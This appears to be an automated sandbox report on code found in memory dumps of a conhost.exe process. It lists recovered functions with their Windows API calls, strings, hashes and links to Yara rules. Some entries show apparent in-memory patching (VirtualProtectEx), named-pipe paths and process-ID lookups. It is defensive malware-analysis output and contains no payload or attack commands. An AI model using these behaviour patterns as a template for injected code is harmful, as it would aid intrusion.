
Function 000002BCD7E31AD4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002BCD7E31AF4
StrCmpNIW.SHLWAPI ref: 000002BCD7E31B0E
lstrlenW.KERNEL32 ref: 000002BCD7E31B1D
StrCpyW.SHLWAPI ref: 000002BCD7E31B32

Strings

\\?\, xrefs: 000002BCD7E31B02

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction ID: b7f28dc4912f6816da8f02aa0178d798d45a77eda66e571749e142fd4775e8e1
Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
Instruction Fuzzy Hash: 97F04F76304A86D6EB208B21F9883597361F744BCDF94403EDA4986E58EF7CC698CB41

Function 000002BCD7E33708 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI(?,?,00000000,000002BCD7E3275A), ref: 000002BCD7E3372A
StrCpyW.SHLWAPI ref: 000002BCD7E3373A
StrCatW.SHLWAPI ref: 000002BCD7E33746
PathCombineW.SHLWAPI(?,?,00000000,000002BCD7E3275A), ref: 000002BCD7E33754

Strings

\\.\pipe\, xrefs: 000002BCD7E33720

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 0265d7062be8b1faad17728ab802dd56e5be354f5276cc7d0bbc982bf4632ee7
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: ABF08278304B8285FA048B13B91811A7360BB48FC5F64813AEE0A07F2DDF3CC455C741

Function 000002BCD7E3B904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000002BCD7E3B929
GetProcAddress.KERNEL32 ref: 000002BCD7E3B93F
FreeLibrary.KERNEL32 ref: 000002BCD7E3B95B

Strings

CorExitProcess, xrefs: 000002BCD7E3B938
mscoree.dll, xrefs: 000002BCD7E3B920

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 915dcd958dc97400fba72f66c38c8ff6aecd60548ebd790ab5015dee4a767f44
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: CDF0903930060289EB148B24A88D3693330EB89769F64023FDA6A45EE4DF3CC458C742

Function 000002BCD7E35810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BCD7E35896

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: 6800e9a7a9467c98d7a479bb0e556bb3751c53812f5bc90549705bd2a1371158
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 50020D36219B858AE7A0CB15F49535AB7A0F3C4795F20013AEA8E87FA8DF7CD444CB41

Function 000002BCD7E32C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002BCD7E32CAD
TlsGetValue.KERNEL32 ref: 000002BCD7E32CBC
TlsGetValue.KERNEL32 ref: 000002BCD7E32CCB
TlsSetValue.KERNEL32 ref: 000002BCD7E32E0F
TlsSetValue.KERNEL32 ref: 000002BCD7E32E1E
TlsSetValue.KERNEL32 ref: 000002BCD7E32E2D

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: 4a91fa9797349b87b653db1094adbcb0a8b339cca98ab1039e704a5aa5b74b23
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: E451A43A6046428FE765CB16E448A5AB3A4F788B85FB4413EDE8A83F54DF39C845CB41

Function 000002BCD7E32AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 000002BCD7E32AE1
TlsGetValue.KERNEL32 ref: 000002BCD7E32AF0
TlsGetValue.KERNEL32 ref: 000002BCD7E32AFF
TlsSetValue.KERNEL32 ref: 000002BCD7E32C3B
TlsSetValue.KERNEL32 ref: 000002BCD7E32C4A
TlsSetValue.KERNEL32 ref: 000002BCD7E32C59

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 25dcfc89930cb48d422d3afdcb38ff3c593449d5aa15ea036552490bd4de1c69
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: F15161396146428FE728CF26E84865AB3A5F788B85F60413EDE8A43F54DF39D845CB41

Function 000002BCD7E35E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002BCD7E35E66

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 1f1241abc97eb049bb6d7761b9860d50986b40b332df65043196c62b4003bc8f
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 1161CB3A129B45CAE7608B25E49931AB7E1F388745F60013AFA8D47FA8DB7CD550CF42

Function 000002BCD7E33EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,000002BCD7E33A5B), ref: 000002BCD7E33F68

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: 77d6beb3827fc4007d5082d6a36ef5fce223a697c2f6b545a2ba2b3bcb12258c
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: F7116D3A60474287EB248B21E40865AB7B0FB45B89F54003FDE4D03FA5EB7EC964C781

Function 000002BCD7E38CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BCD7E38CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 000002BCD7E38D62
RtlUnwindEx.NTDLL ref: 000002BCD7E38DBC

Strings

csm, xrefs: 000002BCD7E38D49

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fd64d4b9173b6c4b5c726f626cd4bbbbbf45d93dd439c2fdec5866d141586114
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: E051263A3016128EDB54CF56E40CB6C37A5F354B89F65423AEA4A87F88DB7CC841C711

Function 000002BCD7E3A6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 000002BCD7E3A75B
_CallSETranslator.LIBVCRUNTIME ref: 000002BCD7E3A7A7

Strings

RCC, xrefs: 000002BCD7E3A777
MOC, xrefs: 000002BCD7E3A76F

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 6382f2f05a751dd2407cb8d27d9d6a32a87eaa0902f8911aae7d2be2088968de
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 4361AD76508BC589EB209F1AE44439AB7A0F785B99F14423AEBD817F99DB7CC190CB01

Function 000002BCD7E3AAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BCD7E3AAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002BCD7E3ABBC

Strings

csm, xrefs: 000002BCD7E3AC0E
csm, xrefs: 000002BCD7E3AAF6

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 7c19ee43088724e99f7ad399caf016a9441aa18842a2d58e39d8785fb435e873
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 8D516E3A2006828FEB74AF26954835877A5F354B96F24413BEA9947FD5CB38C490CB02

Function 000002BCD7E09EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000002BCD7E09ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 000002BCD7E09FBC

Strings

csm, xrefs: 000002BCD7E0A00E
csm, xrefs: 000002BCD7E09EF6

Memory Dump Source

Source File: 00000014.00000003.2594886169.000002BCD7E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BCD7E00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2bcd7e00000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: 6cb3a4d760e140562a7ea21ebdb5dec55e3a0a13240db634c1a6d3229f02a9c7
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 6B516E3A20478A8EEB748F26D54C36877A0F355B98F28413BDA9947FD5CB38D460CB02

Function 000002BCD7E33950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 000002BCD7E33972
StrStrW.SHLWAPI ref: 000002BCD7E33990
StrToIntW.SHLWAPI ref: 000002BCD7E339B7

Part of subcall function 000002BCD7E31A30: OpenProcess.KERNEL32 ref: 000002BCD7E31A56
Part of subcall function 000002BCD7E31A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002BCD7E31A74
Part of subcall function 000002BCD7E31A30: PathFindFileNameW.SHLWAPI ref: 000002BCD7E31A83
Part of subcall function 000002BCD7E31A30: lstrlenW.KERNEL32 ref: 000002BCD7E31A8F
Part of subcall function 000002BCD7E31A30: StrCpyW.SHLWAPI ref: 000002BCD7E31AA2
Part of subcall function 000002BCD7E31A30: CloseHandle.KERNEL32 ref: 000002BCD7E31AB0

Part of subcall function 000002BCD7E33F88: StrCmpNIW.SHLWAPI(?,?,?,000002BCD7E3272F), ref: 000002BCD7E33FA0

Strings

pid_, xrefs: 000002BCD7E33968

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 8e49c6c0f9c788b2ceb326d6141eaf42c6f395e511a0c9958818fa81f7a43e85
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: DA118139310B8395EB109B25E80979A73A4FB44782FA4403F9E59C3FA9EF78C955C741

Function 000002BCD7E41FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002BCD7E42027
WriteFile.KERNEL32 ref: 000002BCD7E42304
WriteFile.KERNEL32 ref: 000002BCD7E4234A
GetLastError.KERNEL32 ref: 000002BCD7E42409

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: 8a40d939716c1c8ca4807348dd281156784480d89b7dd517a8a6d7e4e89d6b12
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: B0D1B93AB14A8589E710CFA5D4482AC3BB9F354B9CF60423ACE5DA7F99DB34C116C341

Function 000002BCD7E314A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002BCD7E314C6
HeapFree.KERNEL32 ref: 000002BCD7E314D5
GetProcessHeap.KERNEL32 ref: 000002BCD7E314E2
HeapFree.KERNEL32 ref: 000002BCD7E314F1
GetProcessHeap.KERNEL32 ref: 000002BCD7E31501

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: 327847b80f9113b73772ccbc390ab9b54c0d0d66ccdedd2e476f38a0508ab9a6
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: 2B011736A10E91DAE714DF66A80914977B1F788F84B29403EDB4953B28DF34D461C781

Function 000002BCD7E428F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002BCD7E428DF), ref: 000002BCD7E42A12

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: c9948afdf8e7e1eaf487a55c046ba97114bd0e55ae711aafc18c19ef510a1c82
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: E591EF3AA106568DFB608FA5D8583AD3BA4B348B9CF64413FDE4A63F85DB34C495C302

Function 000002BCD7E38090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002BCD7E380BC
GetCurrentThreadId.KERNEL32 ref: 000002BCD7E380CA
GetCurrentProcessId.KERNEL32 ref: 000002BCD7E380D6
QueryPerformanceCounter.KERNEL32 ref: 000002BCD7E380E6

Memory Dump Source

Source File: 00000014.00000002.3047668463.000002BCD7E31000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002BCD7E30000, based on PE: true

Associated: 00000014.00000002.3046596422.000002BCD7E30000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3048994464.000002BCD7E45000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3049958100.000002BCD7E50000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3050745902.000002BCD7E52000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.3051444398.000002BCD7E59000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2bcd7e30000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: aee8d5204580b84bcdbd460cde646327ffcf192220f782128c38054e2cad3c8a
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: B5112E3A710F058AEB00CF60E8593A933B4F719758F540E3AEA6D86BA4DB78C164C381

Function 000002BCD7E327E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000002BCD7E328CC
StrCpyW.SHLWAPI ref: 000002BCD7E328E5

Part of subcall function 000002BCD7E33F88: StrCmpNIW.SHLWAPI(?,?,?,000002BCD7E3272F), ref: 000002BCD7E33FA0

Strings

